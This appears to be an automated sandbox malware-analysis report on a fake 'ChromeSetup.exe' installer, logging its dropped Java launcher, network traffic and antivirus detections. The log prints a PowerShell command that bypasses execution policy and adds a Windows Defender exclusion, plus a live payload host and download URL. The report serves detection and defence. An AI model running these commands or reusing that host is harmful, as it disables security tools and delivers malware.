Memory protected: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE			Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Process created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe "C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe" org.develnext.jphp.ext.javafx.FXLauncher	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\97d84ae1f15f1791152b8995b44f6da3.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE	Jump to behavior

Language, Device and Operating System Detection

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\ChromeSetup.exe

Code function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406831

Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Screenshots

Behavior

Click here to start
Slideshow Behavior Animation

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
91.208.197.238	unknown	unknown		200019	ALEXHOSTMD	false

Private

IP
127.0.0.1

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://91.208.197.238/dapp/partdevelopment.zip	false	Avira URL Cloud: safe	unknown

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe

Avira: detection malicious, Label: TR/AVI.Agent.wukun

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe

ReversingLabs: Detection: 47%

Multi AV Scanner detection for submitted file

Source: ChromeSetup.exe	ReversingLabs: Detection: 47%
Source: ChromeSetup.exe	Virustotal: Detection: 40%			Perma Link

Privilege Escalation

EXE planting / hijacking vulnerabilities found

Source: C:\Users\user\Desktop\ChromeSetup.exe

EXE: C:\Users\user\AppData\Local\RoadSpecialized-Launcher\uninst.exe

Jump to behavior

Compliance

EXE planting / hijacking vulnerabilities found

Source: C:\Users\user\Desktop\ChromeSetup.exe

EXE: C:\Users\user\AppData\Local\RoadSpecialized-Launcher\uninst.exe

Jump to behavior

Uses 32bit PE files

Source: ChromeSetup.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\README.txt	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\THIRDPARTYLICENSEREADME-JAVAFX.txt	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\THIRDPARTYLICENSEREADME-JAVAFX.txt	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\THIRDPARTYLICENSEREADME.txt	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\THIRDPARTYLICENSEREADME.txt	Jump to behavior

Source: ChromeSetup.exe

Static PE information: certificate valid

Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe

File opened: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\msvcr100.dll

Jump to behavior

Source: ChromeSetup.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: msvcr100.i386.pdb source: javaw.exe, 00000002.00000002.3392873090.000000006D031000.00000020.00000001.01000000.00000008.sdmp
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\liblcms\lcms.pdb source: lcms.dll.0.dr
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libnio\nio.pdb source: javaw.exe, 00000002.00000002.3391820133.000000006CBC7000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libt2k\t2k.pdb source: t2k.dll.0.dr
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libjava\java.pdb source: javaw.exe, 00000002.00000002.3392107747.000000006CC33000.00000002.00000001.01000000.0000000B.sdmp, java.dll.0.dr
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libnio\nio.pdbic source: javaw.exe, 00000002.00000002.3391820133.000000006CBC7000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: msvcr120.i386.pdb source: javaw.exe, 00000002.00000002.3391610094.000000006CAD1000.00000020.00000001.01000000.0000000F.sdmp
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libjava\java.pdb'% source: javaw.exe, 00000002.00000002.3392107747.000000006CC33000.00000002.00000001.01000000.0000000B.sdmp, java.dll.0.dr
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libzip\zip.pdb source: javaw.exe, 00000002.00000002.3392010694.000000006CC0A000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: msvcp120.i386.pdb source: javaw.exe, 00000002.00000002.3391479640.000000006CA51000.00000020.00000001.01000000.00000010.sdmp
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libawt\awt.pdb source: javaw.exe, 00000002.00000002.3391040673.000000006BF99000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libawt\awt.pdb8^ source: javaw.exe, 00000002.00000002.3391040673.000000006BF99000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libnet\net.pdb source: javaw.exe, 00000002.00000002.3391902623.000000006CBDD000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: C:\Users\devuser\Documents\Visual Studio 2017\Projects\IBuilder\Release\NAct.pdb source: ChromeSetup.exe, 00000000.00000002.1074694666.0000000000420000.00000004.00000001.01000000.00000003.sdmp
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libbci\bci.pdb source: bci.dll.0.dr
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libverify\verify.pdb source: javaw.exe, 00000002.00000002.3392205561.000000006CC56000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\javaw_objs\javaw.pdb source: javaw.exe, 00000002.00000002.3382359288.00000000005FC000.00000002.00000001.01000000.00000007.sdmp, javaw.exe, 00000002.00000000.1024355035.00000000005FC000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\liblcms\lcms.pdb* source: lcms.dll.0.dr
Source:	Binary string: C:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\hotspot\windows_i486_compiler1\product\jvm.pdb source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp

Spreading

Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00406301 FindFirstFileW,FindClose,		0_2_00406301
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,		0_2_00406CC7

Source: C:\Users\user\Desktop\ChromeSetup.exe	File opened: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\lib\deploy	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	File opened: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	File opened: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\	Jump to behavior

Networking

Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238

Source: global traffic	HTTP traffic detected: GET /dapp/partdevelopment.zip HTTP/1.1User-Agent: Java/1.8.0_101Host: 91.208.197.238Accept: text/html, image/gif, image/jpeg, ; q=.2, /*; q=.2Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /dapp/partdevelopment.zip HTTP/1.1User-Agent: Java/1.8.0_101Host: 91.208.197.238Accept: text/html, image/gif, image/jpeg, ; q=.2, /*; q=.2Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /dapp/partdevelopment.zip HTTP/1.1User-Agent: Java/1.8.0_101Host: 91.208.197.238Accept: text/html, image/gif, image/jpeg, ; q=.2, /*; q=.2Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /dapp/partdevelopment.zip HTTP/1.1User-Agent: Java/1.8.0_101Host: 91.208.197.238Accept: text/html, image/gif, image/jpeg, ; q=.2, /*; q=.2Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /dapp/partdevelopment.zip HTTP/1.1User-Agent: Java/1.8.0_101Host: 91.208.197.238Accept: text/html, image/gif, image/jpeg, ; q=.2, /*; q=.2Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /dapp/partdevelopment.zip HTTP/1.1User-Agent: Java/1.8.0_101Host: 91.208.197.238Accept: text/html, image/gif, image/jpeg, ; q=.2, /*; q=.2Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /dapp/partdevelopment.zip HTTP/1.1User-Agent: Java/1.8.0_101Host: 91.208.197.238Accept: text/html, image/gif, image/jpeg, ; q=.2, /*; q=.2Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /dapp/partdevelopment.zip HTTP/1.1User-Agent: Java/1.8.0_101Host: 91.208.197.238Accept: text/html, image/gif, image/jpeg, ; q=.2, /*; q=.2Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /dapp/partdevelopment.zip HTTP/1.1User-Agent: Java/1.8.0_101Host: 91.208.197.238Accept: text/html, image/gif, image/jpeg, ; q=.2, /*; q=.2Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /dapp/partdevelopment.zip HTTP/1.1User-Agent: Java/1.8.0_101Host: 91.208.197.238Accept: text/html, image/gif, image/jpeg, ; q=.2, /*; q=.2Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /dapp/partdevelopment.zip HTTP/1.1User-Agent: Java/1.8.0_101Host: 91.208.197.238Accept: text/html, image/gif, image/jpeg, ; q=.2, /*; q=.2Connection: keep-alive

Source: javaw.exe, 00000002.00000002.3384324223.0000000004DCA000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3384324223.0000000004A00000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3384324223.0000000004B07000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3384324223.0000000004BD9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://91.208.197.238
Source: javaw.exe, 00000002.00000002.3384324223.0000000004BD9000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3387805134.0000000015805000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.208.197.238/dapp/partdevelopment.zip
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/allow-java-encodings
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/allow-java-encodingsl
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/continue-after-fatal-error
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/create-cdata-nodes
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/disallow-doctype-decl
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/disallow-doctype-decllver
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/dom/create-entity-ref-nodes
